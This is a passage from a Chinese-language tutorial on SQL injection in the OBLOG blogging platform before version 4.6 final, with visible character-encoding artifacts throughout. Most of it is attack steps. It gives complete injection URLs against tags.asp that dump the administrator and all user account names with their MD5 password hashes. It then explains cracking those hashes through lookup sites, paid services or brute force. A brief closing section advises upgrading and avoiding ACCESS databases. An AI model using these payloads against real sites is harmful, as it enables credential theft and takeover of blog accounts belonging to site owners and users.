代碼中有兩處是于tagid=42相對應的，這點需要特別留意。當然如果目的站點使用的是MSSQL數(shù)據(jù)庫而不是本文介紹的ACCESS數(shù)據(jù)庫的話，相關(guān)的SQL注入代碼也要進行改變，具體內(nèi)容為——http://IP/tags.asp?t=user&keyword=trace&tagid=42 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username+char(124)+password,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder

　　該命令執(zhí)行后OBLOG將把管理員的帳戶名與密碼顯示出來，我們可以在顯示頁面中看到相關(guān)信息，在|前顯示的是帳戶名，后面是密碼，不過密碼都是通過MD5加密過的。(如圖5)



圖5

第四步：除了讓OBLOG顯示管理員相關(guān)信息外我們還可以通過以下指令讓OBLOG顯示其所有用戶名與密碼信息，這也是非常危險的。具體注入代碼為——

　　http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_user union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2

　　輸入完畢所有在該OBLOG博客平臺上注冊的帳戶與密碼都會顯示出來，同樣密碼是經(jīng)過MD5加密過的。(如圖6)



圖6



　　第五步：有了明文帳戶名與MD5加密過的密碼我們基本上可以直接破解出明文密碼，只需要通過一些MD5查詢站點就能夠?qū)D5密碼順利還原為明文信息。(如圖7)



圖7

　　第六步：不過并不是所有MD5加密密碼都能夠通過查詢站點反查出明文信息的，如果不成功的話我們只能夠通過MD5暴力破解工具實現(xiàn)了，關(guān)于MD5暴力破解工具筆者在以前的文章中進行過詳細的介紹，這里由于篇幅關(guān)系就不繼續(xù)說明了，總之暴力破解MD5密文需要的時間是比較長的，一個7位明文密碼對應MD5密碼的破解需要幾天時間。當然一些MD5密碼反查站點也提供了相關(guān)有償服務，部分密碼的反查需要我們支付一條一毛錢的費用，如果覺得暴力破解麻煩的讀者可以選擇付費服務快速解決問題。(如圖8)



圖8

　　三，如何防范：

　　該漏洞只存在于OBLOG安裝程序是4.6 final版本之前，所以作為OBLOG站點管理員的我們只需要將OBLOG版本進行必要升級，升級到最新版本即可，這樣該注入漏洞就會被順利補掉，我們也完成了安全防范目的。最新的OBLOG升級程序我們可以到www.oblog.cn站點進行下載，相關(guān)升級方法與更新彌補漏洞情況也會在升級程序的幫助文檔中詳細說明，感興趣的讀者可以自行研究。

　　四，總結(jié)：

　　網(wǎng)上很多現(xiàn)成的站點或CMS甚至是BLOG搭建系統(tǒng)都存在著這樣或那樣的漏洞，因此如果企業(yè)使用這些現(xiàn)成程序安裝自身網(wǎng)絡(luò)平臺的話就一定要隨時關(guān)注升級信息，必要時可以在相關(guān)站點注冊會員并記錄自身電子郵件地址，這樣對應程序有升級和新版本發(fā)布時我們就能夠在第一時間收到相關(guān)電子郵件獲得升級通知了。另外在搭建網(wǎng)絡(luò)平臺時盡量避免access數(shù)據(jù)庫的出現(xiàn)，畢竟access數(shù)據(jù)庫不太安全，相關(guān)程序存在漏洞的可能性比較大。

最新評論